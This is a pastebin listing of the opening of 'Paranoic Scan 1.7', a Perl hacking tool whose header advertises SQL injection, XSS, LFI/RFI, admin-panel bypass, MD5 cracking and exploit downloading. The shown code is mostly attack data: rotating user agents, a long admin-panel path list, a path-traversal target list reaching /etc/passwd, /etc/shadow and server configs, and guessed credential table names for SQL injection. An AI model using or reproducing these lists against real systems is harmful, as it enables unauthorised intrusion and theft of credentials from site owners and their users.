SHOW:
|
|
- or go back to the newest paste.
1 | #!usr/bin/perl | |
2 | ################################################################################# | |
3 | #This software is Copyright (c) 2014 by Doddy Hackman. | |
4 | # | |
5 | #This is free software, licensed under: | |
6 | # | |
7 | # The Artistic License 1.0 | |
8 | # | |
9 | #The Artistic License | |
10 | # | |
11 | #Preamble | |
12 | # | |
13 | #The intent of this document is to state the conditions under which a Package | |
14 | #may be copied, such that the Copyright Holder maintains some semblance of | |
15 | #artistic control over the development of the package, while giving the users of | |
16 | #the package the right to use and distribute the Package in a more-or-less | |
17 | #customary fashion, plus the right to make reasonable modifications. | |
18 | # | |
19 | #Definitions: | |
20 | # | |
21 | # - "Package" refers to the collection of files distributed by the Copyright | |
22 | # Holder, and derivatives of that collection of files created through | |
23 | # textual modification. | |
24 | # - "Standard Version" refers to such a Package if it has not been modified, | |
25 | # or has been modified in accordance with the wishes of the Copyright | |
26 | # Holder. | |
27 | # - "Copyright Holder" is whoever is named in the copyright or copyrights for | |
28 | # the package. | |
29 | # - "You" is you, if you're thinking about copying or distributing this Package. | |
30 | # - "Reasonable copying fee" is whatever you can justify on the basis of media | |
31 | # cost, duplication charges, time of people involved, and so on. (You will | |
32 | # not be required to justify it to the Copyright Holder, but only to the | |
33 | # computing community at large as a market that must bear the fee.) | |
34 | # - "Freely Available" means that no fee is charged for the item itself, though | |
35 | # there may be fees involved in handling the item. It also means that | |
36 | # recipients of the item may redistribute it under the same conditions they | |
37 | # received it. | |
38 | # | |
39 | #1. You may make and give away verbatim copies of the source form of the | |
40 | #Standard Version of this Package without restriction, provided that you | |
41 | #duplicate all of the original copyright notices and associated disclaimers. | |
42 | # | |
43 | #2. You may apply bug fixes, portability fixes and other modifications derived | |
44 | #from the Public Domain or from the Copyright Holder. A Package modified in such | |
45 | #a way shall still be considered the Standard Version. | |
46 | # | |
47 | #3. You may otherwise modify your copy of this Package in any way, provided that | |
48 | #you insert a prominent notice in each changed file stating how and when you | |
49 | #changed that file, and provided that you do at least ONE of the following: | |
50 | # | |
51 | # a) place your modifications in the Public Domain or otherwise make them | |
52 | # Freely Available, such as by posting said modifications to Usenet or an | |
53 | # equivalent medium, or placing the modifications on a major archive site | |
54 | # such as ftp.uu.net, or by allowing the Copyright Holder to include your | |
55 | # modifications in the Standard Version of the Package. | |
56 | # | |
57 | # b) use the modified Package only within your corporation or organization. | |
58 | # | |
59 | # c) rename any non-standard executables so the names do not conflict with | |
60 | # standard executables, which must also be provided, and provide a separate | |
61 | # manual page for each non-standard executable that clearly documents how it | |
62 | # differs from the Standard Version. | |
63 | # | |
64 | # d) make other distribution arrangements with the Copyright Holder. | |
65 | # | |
66 | #4. You may distribute the programs of this Package in object code or executable | |
67 | #form, provided that you do at least ONE of the following: | |
68 | # | |
69 | # a) distribute a Standard Version of the executables and library files, | |
70 | # together with instructions (in the manual page or equivalent) on where to | |
71 | # get the Standard Version. | |
72 | # | |
73 | # b) accompany the distribution with the machine-readable source of the Package | |
74 | # with your modifications. | |
75 | # | |
76 | # c) accompany any non-standard executables with their corresponding Standard | |
77 | # Version executables, giving the non-standard executables non-standard | |
78 | # names, and clearly documenting the differences in manual pages (or | |
79 | # equivalent), together with instructions on where to get the Standard | |
80 | # Version. | |
81 | # | |
82 | # d) make other distribution arrangements with the Copyright Holder. | |
83 | # | |
84 | #5. You may charge a reasonable copying fee for any distribution of this | |
85 | #Package. You may charge any fee you choose for support of this Package. You | |
86 | #may not charge a fee for this Package itself. However, you may distribute this | |
87 | #Package in aggregate with other (possibly commercial) programs as part of a | |
88 | #larger (possibly commercial) software distribution provided that you do not | |
89 | #advertise this Package as a product of your own. | |
90 | # | |
91 | #6. The scripts and library files supplied as input to or produced as output | |
92 | #from the programs of this Package do not automatically fall under the copyright | |
93 | #of this Package, but belong to whomever generated them, and may be sold | |
94 | #commercially, and may be aggregated with this Package. | |
95 | # | |
96 | #7. C or perl subroutines supplied by you and linked into this Package shall not | |
97 | #be considered part of this Package. | |
98 | # | |
99 | #8. The name of the Copyright Holder may not be used to endorse or promote | |
100 | #products derived from this software without specific prior written permission. | |
101 | # | |
102 | #9. THIS PACKAGE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR IMPLIED | |
103 | #WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF | |
104 | #MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE. | |
105 | # | |
106 | #The End | |
107 | ################################################################################# | |
108 | #Paranoic Scan 1.7 | |
109 | #(C) Doddy Hackman 2014 | |
110 | #Necessary modules | |
111 | #http://search.cpan.org/~animator/Color-Output-1.05/Output.pm | |
112 | #ppm install http://trouchelle.com/ppm/Color-Output.ppd | |
113 | #ppm install http://www.eekboek.nl/dl/ppms/Crypt-SSLeay.ppd | |
114 | #http://search.cpan.org/~exiftool/Image-ExifTool-9.27/lib/Image/ExifTool.pod | |
115 | #ppm install http://trouchelle.com/ppm/Image-ExifTool.ppd | |
116 | #http://search.cpan.org/~timb/DBI-1.630/DBI.pm | |
117 | #http://search.cpan.org/~capttofu/DBD-mysql-4.025/lib/DBD/mysql.pm | |
118 | #The arrays are a collection of several I found on the web | |
119 | # | |
120 | #[++] Old Options | |
121 | # | |
122 | #Google & Bing Scanner that also scan : | |
123 | # | |
124 | # * XSS | |
125 | # * SQL GET / POST | |
126 | # * SQL GET | |
127 | # * SQL GET + Admin | |
128 | # * Directory listing | |
129 | # * MSSQL | |
130 | # * Jet Database | |
131 | # * Oracle | |
132 | # * LFI | |
133 | # * RFI | |
134 | # * Full Source Discloure | |
135 | # * HTTP Information | |
136 | # * SQLi Scanner | |
137 | # * Bypass Admin | |
138 | # * Exploit FSD Manager | |
139 | # * Paths Finder | |
140 | # * Locate IP | |
141 | # * Crack MD5 | |
142 | # * Panel Finder | |
143 | # * Console | |
144 | # | |
145 | #[++] Fixes | |
146 | # | |
147 | #[+] Refresh of existing pages to crack md5 | |
148 | #[+] Error scanner fsd | |
149 | #[+] Http error scanner scan | |
150 | #[+] Spaces between text too annoying | |
151 | #[+] Added array to bypass | |
152 | #[+] Failed to read from file | |
153 | #[+] Fixed google & bing scanner | |
154 | # | |
155 | #[++] New options | |
156 | # | |
157 | #[+] Generate all logs in a html file | |
158 | #[+] Incorporates random and new useragent | |
159 | #[+] Multi encoder / decoder : | |
160 | # | |
161 | # * Ascii | |
162 | # * Hex | |
163 | # * Url | |
164 | # * Bin To Text & Text To Bin | |
165 | # | |
166 | #[+] PortScanner | |
167 | #[+] HTTP FingerPrinting | |
168 | #[+] CSRF Tool | |
169 | #[+] Scan XSS | |
170 | #[+] Generator for XSS Bypass | |
171 | #[+] Generator tiny url links to | |
172 | #[+] Finder and downloader exploits on Exploit-DB | |
173 | #[+] Mysql Manager | |
174 | #[+] Tools LFI | |
175 | # | |
176 | ################################################################################# | |
177 | ||
178 | use Color::Output; | |
179 | Color::Output::Init; | |
180 | use LWP::UserAgent; | |
181 | use URI::Escape; | |
182 | use IO::Socket; | |
183 | use URI::Split qw(uri_split); | |
184 | use URI::Escape; | |
185 | use File::Basename; | |
186 | use HTML::Form; | |
187 | use HTML::Parser; | |
188 | use HTML::LinkExtor; | |
189 | use HTML::Form; | |
190 | use Time::HiRes "usleep"; | |
191 | use Image::ExifTool; | |
192 | use Digest::MD5 qw(md5_hex); | |
193 | use MIME::Base64; | |
194 | use DBI; | |
195 | use Cwd; | |
196 | ||
197 | $|++; | |
198 | ||
199 | ## | |
200 | ||
201 | ##Arrays | |
202 | ||
203 | my @agents = ( | |
204 | 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0', | |
205 | 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14', | |
206 | 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36', | |
207 | 'Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0', | |
208 | 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1', | |
209 | 'Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))', | |
210 | 'Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14', | |
211 | 'Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27' | |
212 | ); | |
213 | ||
214 | my @paneles = ( | |
215 | 'admin/admin.asp', 'admin/login.asp', | |
216 | 'admin/index.asp', 'admin/admin.aspx', | |
217 | 'admin/login.aspx', 'admin/index.aspx', | |
218 | 'admin/webmaster.asp', 'admin/webmaster.aspx', | |
219 | 'asp/admin/index.asp', 'asp/admin/index.aspx', | |
220 | 'asp/admin/admin.asp', 'asp/admin/admin.aspx', | |
221 | 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', | |
222 | 'admin/', 'login.asp', | |
223 | 'login.aspx', 'admin.asp', | |
224 | 'admin.aspx', 'webmaster.aspx', | |
225 | 'webmaster.asp', 'login/index.asp', | |
226 | 'login/index.aspx', 'login/login.asp', | |
227 | 'login/login.aspx', 'login/admin.asp', | |
228 | 'login/admin.aspx', 'administracion/index.asp', | |
229 | 'administracion/index.aspx', 'administracion/login.asp', | |
230 | 'administracion/login.aspx', 'administracion/webmaster.asp', | |
231 | 'administracion/webmaster.aspx', 'administracion/admin.asp', | |
232 | 'administracion/admin.aspx', 'php/admin/', | |
233 | 'admin/admin.php', 'admin/index.php', | |
234 | 'admin/login.php', 'admin/system.php', | |
235 | 'admin/ingresar.php', 'admin/administrador.php', | |
236 | 'admin/default.php', 'administracion/', | |
237 | 'administracion/index.php', 'administracion/login.php', | |
238 | 'administracion/ingresar.php', 'administracion/admin.php', | |
239 | 'administration/', 'administration/index.php', | |
240 | 'administration/login.php', 'administrator/index.php', | |
241 | 'administrator/login.php', 'administrator/system.php', | |
242 | 'system/', 'system/login.php', | |
243 | 'admin.php', 'login.php', | |
244 | 'administrador.php', 'administration.php', | |
245 | 'administrator.php', 'admin1.html', | |
246 | 'admin1.php', 'admin2.php', | |
247 | 'admin2.html', 'yonetim.php', | |
248 | 'yonetim.html', 'yonetici.php', | |
249 | 'yonetici.html', 'adm/', | |
250 | 'admin/account.php', 'admin/account.html', | |
251 | 'admin/index.html', 'admin/login.html', | |
252 | 'admin/home.php', 'admin/controlpanel.html', | |
253 | 'admin/controlpanel.php', 'admin.html', | |
254 | 'admin/cp.php', 'admin/cp.html', | |
255 | 'cp.php', 'cp.html', | |
256 | 'administrator/', 'administrator/index.html', | |
257 | 'administrator/login.html', 'administrator/account.html', | |
258 | 'administrator/account.php', 'administrator.html', | |
259 | 'login.html', 'modelsearch/login.php', | |
260 | 'moderator.php', 'moderator.html', | |
261 | 'moderator/login.php', 'moderator/login.html', | |
262 | 'moderator/admin.php', 'moderator/admin.html', | |
263 | 'moderator/', 'account.php', | |
264 | 'account.html', 'controlpanel/', | |
265 | 'controlpanel.php', 'controlpanel.html', | |
266 | 'admincontrol.php', 'admincontrol.html', | |
267 | 'adminpanel.php', 'adminpanel.html', | |
268 | 'admin1.asp', 'admin2.asp', | |
269 | 'yonetim.asp', 'yonetici.asp', | |
270 | 'admin/account.asp', 'admin/home.asp', | |
271 | 'admin/controlpanel.asp', 'admin/cp.asp', | |
272 | 'cp.asp', 'administrator/index.asp', | |
273 | 'administrator/login.asp', 'administrator/account.asp', | |
274 | 'administrator.asp', 'modelsearch/login.asp', | |
275 | 'moderator.asp', 'moderator/login.asp', | |
276 | 'moderator/admin.asp', 'account.asp', | |
277 | 'controlpanel.asp', 'admincontrol.asp', | |
278 | 'adminpanel.asp', 'fileadmin/', | |
279 | 'fileadmin.php', 'fileadmin.asp', | |
280 | 'fileadmin.html', 'administration.html', | |
281 | 'sysadmin.php', 'sysadmin.html', | |
282 | 'phpmyadmin/', 'myadmin/', | |
283 | 'sysadmin.asp', 'sysadmin/', | |
284 | 'ur-admin.asp', 'ur-admin.php', | |
285 | 'ur-admin.html', 'ur-admin/', | |
286 | 'Server.php', 'Server.html', | |
287 | 'Server.asp', 'Server/', | |
288 | 'wp-admin/', 'administr8.php', | |
289 | 'administr8.html', 'administr8/', | |
290 | 'administr8.asp', 'webadmin/', | |
291 | 'webadmin.php', 'webadmin.asp', | |
292 | 'webadmin.html', 'administratie/', | |
293 | 'admins/', 'admins.php', | |
294 | 'admins.asp', 'admins.html', | |
295 | 'administrivia/', 'Database_Administration/', | |
296 | 'WebAdmin/', 'useradmin/', | |
297 | 'sysadmins/', 'admin1/', | |
298 | 'system-administration/', 'administrators/', | |
299 | 'pgadmin/', 'directadmin/', | |
300 | 'staradmin/', 'ServerAdministrator/', | |
301 | 'SysAdmin/', 'administer/', | |
302 | 'LiveUser_Admin/', 'sys-admin/', | |
303 | 'typo3/', 'panel/', | |
304 | 'cpanel/', 'cPanel/', | |
305 | 'cpanel_file/', 'platz_login/', | |
306 | 'rcLogin/', 'blogindex/', | |
307 | 'formslogin/', 'autologin/', | |
308 | 'support_login/', 'meta_login/', | |
309 | 'manuallogin/', 'simpleLogin/', | |
310 | 'loginflat/', 'utility_login/', | |
311 | 'showlogin/', 'memlogin/', | |
312 | 'members/', 'login-redirect/', | |
313 | 'sub-login/', 'wp-login/', | |
314 | 'login1/', 'dir-login/', | |
315 | 'login_db/', 'xlogin/', | |
316 | 'smblogin/', 'customer_login/', | |
317 | 'UserLogin/', 'login-us/', | |
318 | 'acct_login/', 'admin_area/', | |
319 | 'bigadmin/', 'project-admins/', | |
320 | 'phppgadmin/', 'pureadmin/', | |
321 | 'sql-admin/', 'radmind/', | |
322 | 'openvpnadmin/', 'wizmysqladmin/', | |
323 | 'vadmind/', 'ezsqliteadmin/', | |
324 | 'hpwebjetadmin/', 'newsadmin/', | |
325 | 'adminpro/', 'Lotus_Domino_Admin/', | |
326 | 'bbadmin/', 'vmailadmin/', | |
327 | 'Indy_admin/', 'ccp14admin/', | |
328 | 'irc-macadmin/', 'banneradmin/', | |
329 | 'sshadmin/', 'phpldapadmin/', | |
330 | 'macadmin/', 'administratoraccounts/', | |
331 | 'admin4_account/', 'admin4_colon/', | |
332 | 'radmind-1/', 'Super-Admin/', | |
333 | 'AdminTools/', 'cmsadmin/', | |
334 | 'SysAdmin2/', 'globes_admin/', | |
335 | 'cadmins/', 'phpSQLiteAdmin/', | |
336 | 'navSiteAdmin/', 'server_admin_small/', | |
337 | 'logo_sysadmin/', 'server/', | |
338 | 'database_administration/', 'power_user/', | |
339 | 'system_administration/', 'ss_vms_admin_sm/' | |
340 | ); | |
341 | ||
342 | #my @files = ("/opt/lampp/htdocs/fofo.txt","/opt/lampp/htdocs/fofo.txt"); | |
343 | ||
344 | my @files = ( | |
345 | 'C:/xampp/htdocs/aca.txt', | |
346 | '../lfi.php', | |
347 | 'C:/xampp/htdocs/admin.php', | |
348 | 'C:/xampp/htdocs/leer.txt', | |
349 | '../../../boot.ini', | |
350 | '../../../../boot.ini', | |
351 | '../../../../../boot.ini', | |
352 | '../../../../../../boot.ini', | |
353 | '/etc/passwd', | |
354 | '/etc/shadow', | |
355 | '/etc/shadow~', | |
356 | '/etc/hosts', | |
357 | '/etc/motd', | |
358 | '/etc/apache/apache.conf', | |
359 | '/etc/fstab', | |
360 | '/etc/apache2/apache2.conf', | |
361 | '/etc/apache/httpd.conf', | |
362 | '/etc/httpd/conf/httpd.conf', | |
363 | '/etc/apache2/httpd.conf', | |
364 | '/etc/apache2/sites-available/default', | |
365 | '/etc/mysql/my.cnf', | |
366 | '/etc/my.cnf', | |
367 | '/etc/sysconfig/network-scripts/ifcfg-eth0', | |
368 | '/etc/redhat-release', | |
369 | '/etc/httpd/conf.d/php.conf', | |
370 | '/etc/pam.d/proftpd', | |
371 | '/etc/phpmyadmin/config.inc.php', | |
372 | '/var/www/config.php', | |
373 | '/etc/httpd/logs/error_log', | |
374 | '/etc/httpd/logs/error.log', | |
375 | '/etc/httpd/logs/access_log', | |
376 | '/etc/httpd/logs/access.log', | |
377 | '/var/log/apache/error_log', | |
378 | '/var/log/apache/error.log', | |
379 | '/var/log/apache/access_log', | |
380 | '/var/log/apache/access.log', | |
381 | '/var/log/apache2/error_log', | |
382 | '/var/log/apache2/error.log', | |
383 | '/var/log/apache2/access_log', | |
384 | '/var/log/apache2/access.log', | |
385 | '/var/www/logs/error_log', | |
386 | '/var/www/logs/error.log', | |
387 | '/var/www/logs/access_log', | |
388 | '/var/www/logs/access.log', | |
389 | '/usr/local/apache/logs/error_log', | |
390 | '/usr/local/apache/logs/error.log', | |
391 | '/usr/local/apache/logs/access_log', | |
392 | '/usr/local/apache/logs/access.log', | |
393 | '/var/log/error_log', | |
394 | '/var/log/error.log', | |
395 | '/var/log/access_log', | |
396 | '/var/log/access.log', | |
397 | '/etc/group', | |
398 | '/etc/security/group', | |
399 | '/etc/security/passwd', | |
400 | '/etc/security/user', | |
401 | '/etc/security/environ', | |
402 | '/etc/security/limits', | |
403 | '/usr/lib/security/mkuser.default', | |
404 | '/apache/logs/access.log', | |
405 | '/apache/logs/error.log', | |
406 | '/etc/httpd/logs/acces_log', | |
407 | '/etc/httpd/logs/acces.log', | |
408 | '/var/log/httpd/access_log', | |
409 | '/var/log/httpd/error_log', | |
410 | '/apache2/logs/error.log', | |
411 | '/apache2/logs/access.log', | |
412 | '/logs/error.log', | |
413 | '/logs/access.log', | |
414 | '/usr/local/apache2/logs/access_log', | |
415 | '/usr/local/apache2/logs/access.log', | |
416 | '/usr/local/apache2/logs/error_log', | |
417 | '/usr/local/apache2/logs/error.log', | |
418 | '/var/log/httpd/access.log', | |
419 | '/var/log/httpd/error.log', | |
420 | '/opt/lampp/logs/access_log', | |
421 | '/opt/lampp/logs/error_log', | |
422 | '/opt/xampp/logs/access_log', | |
423 | '/opt/xampp/logs/error_log', | |
424 | '/opt/lampp/logs/access.log', | |
425 | '/opt/lampp/logs/error.log', | |
426 | '/opt/xampp/logs/access.log', | |
427 | '/opt/xampp/logs/error.log', | |
428 | 'C:\ProgramFiles\ApacheGroup\Apache\logs\access.log', | |
429 | 'C:\ProgramFiles\ApacheGroup\Apache\logs\error.log', | |
430 | '/usr/local/apache/conf/httpd.conf', | |
431 | '/usr/local/apache2/conf/httpd.conf', | |
432 | '/etc/apache/conf/httpd.conf', | |
433 | '/usr/local/etc/apache/conf/httpd.conf', | |
434 | '/usr/local/apache/httpd.conf', | |
435 | '/usr/local/apache2/httpd.conf', | |
436 | '/usr/local/httpd/conf/httpd.conf', | |
437 | '/usr/local/etc/apache2/conf/httpd.conf', | |
438 | '/usr/local/etc/httpd/conf/httpd.conf', | |
439 | '/usr/apache2/conf/httpd.conf', | |
440 | '/usr/apache/conf/httpd.conf', | |
441 | '/usr/local/apps/apache2/conf/httpd.conf', | |
442 | '/usr/local/apps/apache/conf/httpd.conf', | |
443 | '/etc/apache2/conf/httpd.conf', | |
444 | '/etc/http/conf/httpd.conf', | |
445 | '/etc/httpd/httpd.conf', | |
446 | '/etc/http/httpd.conf', | |
447 | '/etc/httpd.conf', | |
448 | '/opt/apache/conf/httpd.conf', | |
449 | '/opt/apache2/conf/httpd.conf', | |
450 | '/var/www/conf/httpd.conf', | |
451 | '/private/etc/httpd/httpd.conf', | |
452 | '/private/etc/httpd/httpd.conf.default', | |
453 | '/Volumes/webBackup/opt/apache2/conf/httpd.conf', | |
454 | '/Volumes/webBackup/private/etc/httpd/httpd.conf', | |
455 | '/Volumes/webBackup/private/etc/httpd/httpd.conf.default', | |
456 | 'C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf', | |
457 | 'C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf', | |
458 | 'C:\ProgramFiles\xampp\apache\conf\httpd.conf', | |
459 | '/usr/local/php/httpd.conf.php', | |
460 | '/usr/local/php4/httpd.conf.php', | |
461 | '/usr/local/php5/httpd.conf.php', | |
462 | '/usr/local/php/httpd.conf', | |
463 | '/usr/local/php4/httpd.conf', | |
464 | '/usr/local/php5/httpd.conf', | |
465 | '/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf', | |
466 | '/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf', | |
467 | '/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf', | |
468 | '/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php', | |
469 | '/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php', | |
470 | '/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php', | |
471 | '/usr/local/etc/apache/vhosts.conf', | |
472 | '/etc/php.ini', | |
473 | '/bin/php.ini', | |
474 | '/etc/httpd/php.ini', | |
475 | '/usr/lib/php.ini', | |
476 | '/usr/lib/php/php.ini', | |
477 | '/usr/local/etc/php.ini', | |
478 | '/usr/local/lib/php.ini', | |
479 | '/usr/local/php/lib/php.ini', | |
480 | '/usr/local/php4/lib/php.ini', | |
481 | '/usr/local/php5/lib/php.ini', | |
482 | '/usr/local/apache/conf/php.ini', | |
483 | '/etc/php4.4/fcgi/php.ini', | |
484 | '/etc/php4/apache/php.ini', | |
485 | '/etc/php4/apache2/php.ini', | |
486 | '/etc/php5/apache/php.ini', | |
487 | '/etc/php5/apache2/php.ini', | |
488 | '/etc/php/php.ini', | |
489 | '/etc/php/php4/php.ini', | |
490 | '/etc/php/apache/php.ini', | |
491 | '/etc/php/apache2/php.ini', | |
492 | '/web/conf/php.ini', | |
493 | '/usr/local/Zend/etc/php.ini', | |
494 | '/opt/xampp/etc/php.ini', | |
495 | '/var/local/www/conf/php.ini', | |
496 | '/etc/php/cgi/php.ini', | |
497 | '/etc/php4/cgi/php.ini', | |
498 | '/etc/php5/cgi/php.ini', | |
499 | 'c:\php5\php.ini', | |
500 | 'c:\php4\php.ini', | |
501 | 'c:\php\php.ini', | |
502 | 'c:\PHP\php.ini', | |
503 | 'c:\WINDOWS\php.ini', | |
504 | 'c:\WINNT\php.ini', | |
505 | 'c:\apache\php\php.ini', | |
506 | 'c:\xampp\apache\bin\php.ini', | |
507 | 'c:\NetServer\bin\stable\apache\php.ini', | |
508 | 'c:\home2\bin\stable\apache\php.ini', | |
509 | 'c:\home\bin\stable\apache\php.ini', | |
510 | '/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini', | |
511 | '/usr/local/cpanel/logs', | |
512 | '/usr/local/cpanel/logs/stats_log', | |
513 | '/usr/local/cpanel/logs/access_log', | |
514 | '/usr/local/cpanel/logs/error_log', | |
515 | '/usr/local/cpanel/logs/license_log', | |
516 | '/usr/local/cpanel/logs/login_log', | |
517 | '/var/cpanel/cpanel.config', | |
518 | '/var/log/mysql/mysql-bin.log', | |
519 | '/var/log/mysql.log', | |
520 | '/var/log/mysqlderror.log', | |
521 | '/var/log/mysql/mysql.log', | |
522 | '/var/log/mysql/mysql-slow.log', | |
523 | '/var/mysql.log', | |
524 | '/var/lib/mysql/my.cnf', | |
525 | 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err', | |
526 | 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log', | |
527 | 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err', | |
528 | 'C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log', | |
529 | 'C:\ProgramFiles\MySQL\data\hostname.err', | |
530 | 'C:\ProgramFiles\MySQL\data\mysql.log', | |
531 | 'C:\ProgramFiles\MySQL\data\mysql.err', | |
532 | 'C:\ProgramFiles\MySQL\data\mysql-bin.log', | |
533 | 'C:\MySQL\data\hostname.err', | |
534 | 'C:\MySQL\data\mysql.log', | |
535 | 'C:\MySQL\data\mysql.err', | |
536 | 'C:\MySQL\data\mysql-bin.log', | |
537 | 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini', | |
538 | 'C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf', | |
539 | 'C:\ProgramFiles\MySQL\my.ini', | |
540 | 'C:\ProgramFiles\MySQL\my.cnf', | |
541 | 'C:\MySQL\my.ini', | |
542 | 'C:\MySQL\my.cnf', | |
543 | '/etc/logrotate.d/proftpd', | |
544 | '/www/logs/proftpd.system.log', | |
545 | '/var/log/proftpd', | |
546 | '/etc/proftp.conf', | |
547 | '/etc/protpd/proftpd.conf', | |
548 | '/etc/vhcs2/proftpd/proftpd.conf', | |
549 | '/etc/proftpd/modules.conf', | |
550 | '/var/log/vsftpd.log', | |
551 | '/etc/vsftpd.chroot_list', | |
552 | '/etc/logrotate.d/vsftpd.log', | |
553 | '/etc/vsftpd/vsftpd.conf', | |
554 | '/etc/vsftpd.conf', | |
555 | '/etc/chrootUsers', | |
556 | '/var/log/xferlog', | |
557 | '/var/adm/log/xferlog', | |
558 | '/etc/wu-ftpd/ftpaccess', | |
559 | '/etc/wu-ftpd/ftphosts', | |
560 | '/etc/wu-ftpd/ftpusers', | |
561 | '/usr/sbin/pure-config.pl', | |
562 | '/usr/etc/pure-ftpd.conf', | |
563 | '/etc/pure-ftpd/pure-ftpd.conf', | |
564 | '/usr/local/etc/pure-ftpd.conf', | |
565 | '/usr/local/etc/pureftpd.pdb', | |
566 | '/usr/local/pureftpd/etc/pureftpd.pdb', | |
567 | '/usr/local/pureftpd/sbin/pure-config.pl', | |
568 | '/usr/local/pureftpd/etc/pure-ftpd.conf', | |
569 | '/etc/pure-ftpd/pure-ftpd.pdb', | |
570 | '/etc/pureftpd.pdb', | |
571 | '/etc/pureftpd.passwd', | |
572 | '/etc/pure-ftpd/pureftpd.pdb', | |
573 | '/var/log/pure-ftpd/pure-ftpd.log', | |
574 | '/logs/pure-ftpd.log', | |
575 | '/var/log/pureftpd.log', | |
576 | '/var/log/ftp-proxy/ftp-proxy.log', | |
577 | '/var/log/ftp-proxy', | |
578 | '/var/log/ftplog', | |
579 | '/etc/logrotate.d/ftp', | |
580 | '/etc/ftpchroot', | |
581 | '/etc/ftphosts', | |
582 | '/var/log/exim_mainlog', | |
583 | '/var/log/exim/mainlog', | |
584 | '/var/log/maillog', | |
585 | '/var/log/exim_paniclog', | |
586 | '/var/log/exim/paniclog', | |
587 | '/var/log/exim/rejectlog', | |
588 | '/var/log/exim_rejectlog' | |
589 | ); | |
590 | my @buscar1 = ( | |
591 | 'usuario', 'web_users', | |
592 | 'name', 'names', | |
593 | 'nombre', 'nombres', | |
594 | 'usuarios', 'member', | |
595 | 'members', 'admin_table', | |
596 | 'usuaris', 'admin', | |
597 | 'tblUsers', 'tblAdmin', | |
598 | 'user', 'users', | |
599 | 'username', 'usernames', | |
600 | 'web_usuarios', 'miembro', | |
601 | 'miembros', 'membername', | |
602 | 'admins', 'administrator', | |
603 | 'sign', 'config', | |
604 | 'USUARIS', 'cms_operadores', | |
605 | 'administrators', 'passwd', | |
606 | 'password', 'passwords', | |
607 | 'pass', 'Pass', | |
608 | 'mpn_authors', 'author', | |
609 | 'musuario', 'mysql.user', | |
610 | 'user_names', 'foro', | |
611 | 'tAdmin', 'tadmin', | |
612 | 'user_password', 'user_passwords', | |
613 | 'user_name', 'member_password', | |
614 | 'mods', 'mod', | |
615 | 'moderators', 'moderator', | |
616 | 'user_email', 'jos_users', | |
617 | 'mb_user', 'host', | |
618 | 'apellido_nombre', 'user_emails', | |
619 | 'user_mail', 'user_mails', | |
620 | 'mail', 'emails', | |
621 | 'email', 'address', | |
622 | 'jos_usuarios', 'tutorial_user_auth', | |
623 | 'e-mail', 'emailaddress', | |
624 | 'correo', 'correos', | |
625 | 'phpbb_users', 'log', | |
626 | 'logins', 'login', | |
627 | 'tbl_usuarios', 'user_auth', | |
628 | 'login_radio', 'registers', | |
629 | 'register', 'usr', | |
630 | 'usrs', 'ps', | |
631 | 'pw', 'un', | |
632 | 'u_name', 'u_pass', | |
633 | 'tbl_admin', 'usuarios_head', | |
634 | 'tpassword', 'tPassword', | |
635 | 'u_password', 'nick', | |
636 | 'nicks', 'manager', | |
637 | 'managers', 'administrador', | |
638 | 'BG_CMS_Users', 'tUser', | |
639 | 'tUsers', 'administradores', | |
640 | 'clave', 'login_id', | |
641 | 'pwd', 'pas', | |
642 | 'sistema_id', 'foro_usuarios', | |
643 | 'cliente', 'sistema_usuario', | |
644 | 'sistema_password', 'contrasena', | |
645 | 'auth', 'key', | |
646 | 'senha', 'signin', | |
647 | 'dir_admin', 'alias', | |
648 | 'clientes', 'tb_admin', | |
649 | 'tb_administrator', 'tb_login', | |
650 | 'tb_logon', 'tb_members_tb_member', | |
651 | 'calendar_users', 'cursos', | |
652 | 'tb_users', 'tb_user', | |
653 | 'tb_sys', 'sys', | |
654 | 'fazerlogon', 'logon', | |
655 | 'fazer', 'authorization', | |
656 | 'curso', 'membros', | |
657 | 'utilizadores', 'staff', | |
658 | 'nuke_authors', 'accounts', | |
659 | 'account', 'accnts', | |
660 | 'signup', 'leads', | |
661 | 'lead', 'associated', | |
662 | 'accnt', 'customers', | |
663 | 'customer', 'membres', | |
664 | 'administrateur', 'utilisateur', | |
665 | 'riacms_users', 'tuser', | |
666 | 'tusers', 'utilisateurs', | |
667 | 'amministratore', 'god', | |
668 | 'God', 'authors', | |
669 | 'wp_users', 'tb_usuarios', | |
670 | 'asociado', 'asociados', | |
671 | 'autores', 'autor', | |
672 | 'Users', 'Admin', | |
673 | 'Members', 'tb_usuario', | |
674 | 'Miembros', 'Usuario', | |
